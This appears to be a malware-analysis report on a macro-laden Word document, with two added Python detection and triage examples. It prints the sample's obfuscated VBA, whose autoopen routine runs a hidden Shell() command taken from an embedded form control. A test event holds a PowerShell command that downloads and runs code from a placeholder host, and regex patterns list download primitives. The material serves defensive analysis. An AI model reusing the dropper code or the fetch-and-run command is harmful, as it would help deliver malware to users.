Verdict: MALICIOUS
Risk Score: 250
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample carries a VBA project whose autoopen subroutine runs as soon as the document is opened, the standard entry point for Word macro malware (T1204.002, T1059.005). autoopen calls a single function, X882849603, which wraps an Interaction.Shell() call. The command string passed to Shell() is assembled at run time by concatenating obfuscated variables with the contents of the embedded MSForms TextBox1 control (declared by the VB_Control attribute), so the actual command line is persisted with the ActiveX control in the document's object storage rather than in the macro source, which is why it does not appear in the extracted script. The window-style argument 49 - 49 evaluates to 0 (vbHide), so the spawned process runs without a visible window, and On Error Resume Next keeps any failure silent. The surrounding Select Case blocks switch on variables that are never assigned and contain only assignments between undefined names; they are dead code inserted to pad the module and frustrate static review. Together with the separate finding of a cmd.exe invocation carrying an execution flag, this indicates the shell command downloads and runs a secondary payload, and the ClamAV signature Doc.Malware.Generic-6791421-0 corroborates the verdict. Two caveats for the analyst: the Legacy WordBasic auto-exec heuristic states that no modern VBA project was recovered, which contradicts the extracted macros.bas and should be read as a duplicate of the AutoOpen finding rather than independent evidence; and the only embedded URL, http://schemas.openxmlformats.org/drawingml/2006/main, is a standard OOXML schema namespace, not a network indicator.
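The behaviour summarised above (Word opening the document, the macro's Shell() call, cmd.exe with an execution flag, a secondary download) is what endpoint telemetry sees as a process tree. As an added example that is not part of this report or of the analyzer, the following Python flags Office applications spawning script interpreters over Sysmon-style JSON process-creation events. The events, paths and URL are constructed for the example; the severity tiers, the interpreter set and the decision to attribute every Office-spawned interpreter to T1059.005 are this example's own assumptions.

```python
import json
import re
from typing import List, Optional

# Constructed process-creation events in the shape of Sysmon Event ID 1 exported
# as JSON lines. Paths and the URL are placeholders, not observed data.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/p')\"", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"EventID": 1, "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"}
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
# Child interpreters and the ATT&CK (sub-)technique for the interpreter itself.
INTERPRETERS = {"cmd.exe": "T1059.003", "powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
                "wscript.exe": "T1059", "cscript.exe": "T1059", "mshta.exe": "T1218.005"}
CMD_EXEC_FLAG = re.compile(r'(?:^|\s)/[ck]\b', re.I)
PS_EVASION_FLAGS = re.compile(r'(?:^|\s)-(?:e|ec|enc|encodedcommand|nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b', re.I)
DOWNLOAD_PRIMITIVE = re.compile(r'downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|certutil.*urlcache|msxml2\.xmlhttp|https?://', re.I)


def basename(path: str) -> str:
    return re.split(r'[\\/]', path)[-1].lower()


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert when an Office parent spawns a script interpreter, else None."""
    parent, child = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in INTERPRETERS:
        return None
    cmdline = event.get("CommandLine", "")
    # T1204.002 (user opened the file) and T1059.005 (VBA) assume the Office parent
    # ran a macro, as in this report; process telemetry alone cannot tell a macro
    # from DDE or an exploit, so treat that attribution as an assumption.
    techniques = ["T1204.002", "T1059.005", INTERPRETERS[child]]
    reasons = [f"{parent} spawned {child}"]
    severity = "medium"
    if child == "cmd.exe" and CMD_EXEC_FLAG.search(cmdline):
        severity = "high"
        reasons.append("cmd.exe launched with an execution flag (/c or /k)")
    if "powershell" in cmdline.lower() or child in ("powershell.exe", "pwsh.exe"):
        if "T1059.001" not in techniques:
            techniques.append("T1059.001")
        if PS_EVASION_FLAGS.search(cmdline):
            severity = "high"
            reasons.append("PowerShell hidden/encoded/no-profile flags")
    if DOWNLOAD_PRIMITIVE.search(cmdline):
        severity = "high"
        techniques.append("T1105")  # Ingress Tool Transfer: secondary payload fetch
        reasons.append("download primitive in command line")
    return {"severity": severity, "techniques": techniques, "reasons": reasons,
            "parent": parent, "child": child, "command_line": cmdline}


def scan(jsonl: str) -> List[dict]:
    """Evaluate every non-empty JSON line and keep only the events that alert."""
    alerts = []
    for line in jsonl.strip().splitlines():
        if line.strip():
            alert = evaluate(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['parent']} -> {a['child']}  {a['techniques']}")
        for r in a["reasons"]:
            print("   -", r)
```

On the constructed events the WINWORD.EXE -> cmd.exe /c powershell ... DownloadString chain alerts at high severity, the Excel-spawned bare cmd.exe alerts at medium (interpreter child, no execution flag), and the print helper splwow64.exe and the explorer-spawned cmd.exe do not alert. Tuning in production means extending OFFICE_PARENTS and INTERPRETERS and adding an allow-list for known-good Office child processes rather than loosening the flag checks.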
Heuristics (8)
- ClamAV: Doc.Malware.Generic-6791421-0 [critical] (CLAMAV_DETECTION) ClamAV detected this file as malware: Doc.Malware.Generic-6791421-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS) Document contains VBA macro code
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL) Potential Shell call in VBA. Matched line in script:
  End Select Z10613 = Array(Q458604, q206683, o91403668, Interaction.Shell(CVar("" + w866314 + l64342 + P185603 + t41891071 + v52296721843.TextBox1) + T51909 + i57458 + F01868719, 49 - 49), m176020) Select Case U1257080337759857790387
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC) Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN) AutoOpen macro. Matched line in script:
  Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() X882849603
- Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD) Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC) OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL) One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5230 bytes | c44332bedc2ba3d0bd21249f0bff3bc75ad51a9e9a6b21e3647f3eb3cc32c7cb |

Script preview (first 1,000 lines of the extracted macros.bas):
Attribute VB_Name = "v52296721843"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X882849603
End Sub
Attribute VB_Name = "o96959498790"
Function X882849603()
On Error Resume Next
Select Case n062675306161275
Case 60135391
f423 = E944
o3776 = CInt(K707 / CByte(B278))
a179 = N7084
Case 321606717
h5333 = Z8050
v1563 = J6636
k5166 = CInt(t2571 / CByte(V9872))
Case 11603683
C110 = o2722
z494 = o5023
End Select
Select Case I99264212941631598295
Case 280342777
R935 = W588
P865 = CInt(M6801 / CByte(N1003))
z634 = S654
Case 104312365
n7717 = M651
a726 = o1935
R626 = CInt(I4113 / CByte(f0355))
Case 218282591
k581 = C6267
T6167 = G014
End Select
Z10613 = Array(Q458604, q206683, o91403668, Interaction.Shell(CVar("" + w866314 + l64342 + P185603 + t41891071 + v52296721843.TextBox1) + T51909 + i57458 + F01868719, 49 - 49), m176020)
Select Case U1257080337759857790387
Case 224357340
C6182 = w855
I581 = CInt(X632 / CByte(V2368))
n9674 = n758
Case 50103472
J800 = Z339
o8256 = h493
b309 = CInt(q8727 / CByte(P625))
Case 204247711
m835 = z1850
i0190 = h5126
End Select
Select Case m56681893005131862962125
Case 90238850
V3775 = z315
J031 = CInt(i1998 / CByte(j1702))
i8414 = i5365
Case 199358845
q363 = J654
E641 = i6062
c324 = CInt(E6761 / CByte(N4061))
Case 262072197
m724 = N509
o7605 = N059
End Select
Select Case R2583957750860963362964
Case 123921465
T741 = L0912
a1505 = CInt(V318 / CByte(I4917))
S099 = m932
Case 207095607
J0069 = A387
f1234 = a039
v5149 = CInt(N784 / CByte(h1195))
Case 120549242
r895 = P8795
k249 = E5554
End Select
Select Case z392400854900758
Case 113134832
a494 = s279
t7775 = CInt(a3684 / CByte(f9253))
M356 = j383
Case 195907325
A082 = r882
F222 = i6812
i1462 = CInt(Q057 / CByte(w1687))
Case 289508204
w581 = G1358
j1347 = u464
End Select
End Function
Attribute VB_Name = "r8464022"
Attribute VB_Name = "j9623099036996"
Attribute VB_Name = "M7779076460720"
Attribute VB_Name = "J99201106059509"
Attribute VB_Name = "b86500730880281"
Attribute VB_Name = "j175937719582"
Attribute VB_Name = "k72243029"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q05354839"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h69991359519"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "t43515600"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h715418130736"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "z52932026069970"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "i23531543832"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
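The extracted macros.bas above shows the three things an analyst needs to pull out of a document like this: the auto-exec entry point, whether it reaches an execution sink, and where the sink's command string actually comes from (here an MSForms TextBox control, whose text is not in the VBA source). The dead Select Case padding can be stripped mechanically because each block switches on a variable that is never assigned. As an added example that is not part of this report or of the analyzer, the following Python does that triage over a constructed excerpt shaped like the extracted script; the excerpt, the sink patterns and the auto-exec name list are this example's own, and the call-graph walk only follows bare-name calls, which is all this sample needs.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt shaped like the extracted macros.bas above: an auto-exec
# entry point, dead Select Case padding, and a Shell() sink whose command string
# is assembled from an embedded MSForms TextBox control.
SAMPLE_VBA = '''Attribute VB_Name = "v52296721843"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X882849603
End Sub
Function X882849603()
On Error Resume Next
Select Case n062675306161275
Case 60135391
o3776 = CInt(K707 / CByte(B278))
End Select
Z10613 = Array(Q458604, Interaction.Shell(CVar("" + w866314 + l64342 + v52296721843.TextBox1) + T51909, 49 - 49), m176020)
Select Case U1257080337759857790387
Case 224357340
C6182 = w855
End Select
End Function
'''

PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.I)
END_PROC_RE = re.compile(r'^\s*End\s+(?:Sub|Function)\s*$', re.I)
SELECT_RE = re.compile(r'^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$', re.I)
END_SELECT_RE = re.compile(r'^\s*End\s+Select\s*$', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=', re.M)
CONTROL_RE = re.compile(r'^\s*Attribute\s+VB_Control\s*=\s*"(\w+),', re.M)
SINK_RE = re.compile(r'\bShell\s*\(|WScript\.Shell|CreateObject\s*\(|\.Run\s*\(|\.Exec\s*\(', re.I)
AUTOEXEC = {"autoopen", "auto_open", "document_open", "autoexec", "autoclose",
            "auto_close", "document_close", "autonew", "workbook_open"}

def strip_dead_select_blocks(src: str) -> Tuple[str, int]:
    """Drop Select Case blocks whose selector is never assigned: an unassigned
    Variant is Empty, so no numeric Case label can match and the block is dead."""
    assigned = set(ASSIGN_RE.findall(src))
    lines, out, i, removed = src.splitlines(), [], 0, 0
    while i < len(lines):
        m = SELECT_RE.match(lines[i])
        if m and m.group(1) not in assigned:
            j = i
            while j < len(lines) and not END_SELECT_RE.match(lines[j]):
                j += 1
            if j < len(lines):          # matching End Select found: skip the block
                removed, i = removed + 1, j + 1
                continue
        out.append(lines[i])
        i += 1
    return "\n".join(out) + "\n", removed

def split_procedures(src: str) -> Dict[str, List[str]]:
    # Map each Sub/Function name to the lines of its body.
    procs, current, body = {}, None, []
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m and current is None:
            current, body = m.group(1), []
        elif current is not None and END_PROC_RE.match(line):
            procs[current], current = body, None
        elif current is not None:
            body.append(line)
    return procs

def reachable(procs: Dict[str, List[str]], start: str) -> set:
    # Procedures reachable from `start` by following bare-name calls.
    seen, stack = set(), [start]
    while stack:
        name = stack.pop()
        if name in seen:
            continue
        seen.add(name)
        for line in procs.get(name, []):
            stack.extend(t for t in re.findall(r'\b[A-Za-z_]\w*\b', line) if t in procs)
    return seen

def triage(src: str) -> dict:
    cleaned, removed = strip_dead_select_blocks(src)
    procs = split_procedures(cleaned)
    controls = CONTROL_RE.findall(src)
    entry_points = [p for p in procs if p.lower() in AUTOEXEC]
    sinks = []
    for name, body in procs.items():
        for line in body:
            if SINK_RE.search(line):
                # Form controls feeding the sink: their text lives with the control
                # in the document's object storage, not in the VBA source.
                refs = [c for c in controls if re.search(r'\.' + re.escape(c) + r'\b', line)]
                sinks.append({"proc": name, "line": line.strip(), "control_refs": refs})
    reach = {p for e in entry_points for p in reachable(procs, e)}
    return {"autoexec": entry_points, "sinks": sinks,
            "reaches_sink": any(s["proc"] in reach for s in sinks),
            "dead_blocks_removed": removed, "cleaned_source": cleaned}

if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    print({k: v for k, v in report.items() if k != "cleaned_source"})
```

On the excerpt this reports autoopen as the entry point, two dead Select Case blocks removed, one Shell() sink inside X882849603 that is reachable from autoopen, and TextBox1 as the control feeding the sink. When a sink's control_refs is non-empty, the command line has to be recovered from the control's persisted data in the document rather than from the macro text, which is the step the static heuristics above cannot do for you.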